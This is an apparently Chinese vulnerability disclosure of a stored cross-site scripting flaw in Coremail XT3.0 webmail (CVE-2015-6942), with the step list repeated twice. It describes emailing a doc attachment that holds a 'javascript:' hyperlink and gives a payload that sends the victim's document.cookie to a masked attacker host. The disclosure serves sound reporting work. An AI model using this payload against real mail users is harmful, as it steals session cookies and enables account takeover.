### 简要描述:
Coremail一处存储型跨站脚本漏洞,已申请CVE编号:CVE-2015-6942
### 详细说明:
影响版本:XT3.0
其他版本未测试
测试步骤:
1.首先创建一个带有超链接的doc文档,超链接为"javascript:alert()"
[<img src="https://images.seebug.org/upload/201509/16100028d43d7fca1f4b34217f1609e6a21a48e8.jpg" alt="a.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/16100028d43d7fca1f4b34217f1609e6a21a48e8.jpg)
2.创建一封邮件并上传附件,然后发送给需要攻击的用户(可发送给任意用户)。
3.受害者如果在WebMail里打开邮件并在线预览doc文档时,点击超链接,即可执行攻击代码。
[<img src="https://images.seebug.org/upload/201509/16100425824458fd7d009fe099146b673a5266f3.jpg" alt="b.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/16100425824458fd7d009fe099146b673a5266f3.jpg)
4.重新将文档中的超链接换成location.href方式获取Cookie的超连接的即可
获取Cookie可以使用此超链接:href="javascript:c=escape(document.cookie);q='http://**.**.**.**/xss/index.htm?ck=';location.href=(q+c)"
这里只是测试获取cookie,用其他方式发送Cookie也可以。
[<img src="https://images.seebug.org/upload/201509/161007510dda7b8163b650b9c2e812e203598046.jpg" alt="c.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/161007510dda7b8163b650b9c2e812e203598046.jpg)
5.访问收信后台即可看到Cookie
[<img src="https://images.seebug.org/upload/201509/161014128039c38918bc5c4ab0768c4365fbeaca.png" alt="d.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/161014128039c38918bc5c4ab0768c4365fbeaca.png)
### 漏洞证明:
1.首先创建一个带有超链接的doc文档,超链接为"javascript:alert()"
[<img src="https://images.seebug.org/upload/201509/16100028d43d7fca1f4b34217f1609e6a21a48e8.jpg" alt="a.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/16100028d43d7fca1f4b34217f1609e6a21a48e8.jpg)
2.创建一封邮件并上传附件,然后发送给需要攻击的用户(可发送给任意用户)。
3.受害者如果在WebMail里打开邮件并在线预览doc文档时,点击超链接,即可执行攻击代码。
[<img src="https://images.seebug.org/upload/201509/16100425824458fd7d009fe099146b673a5266f3.jpg" alt="b.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/16100425824458fd7d009fe099146b673a5266f3.jpg)
4.重新将文档中的超链接换成location.href方式获取Cookie的超连接的即可
获取Cookie可以使用此超链接:href="javascript:c=escape(document.cookie);q='http://**.**.**.**/xss/index.htm?ck=';location.href=(q+c)"
这里只是测试获取cookie,用其他方式发送Cookie也可以。
[<img src="https://images.seebug.org/upload/201509/161007510dda7b8163b650b9c2e812e203598046.jpg" alt="c.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/161007510dda7b8163b650b9c2e812e203598046.jpg)
5.访问收信后台即可看到Cookie
[<img src="https://images.seebug.org/upload/201509/161014128039c38918bc5c4ab0768c4365fbeaca.png" alt="d.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/161014128039c38918bc5c4ab0768c4365fbeaca.png)
暂无评论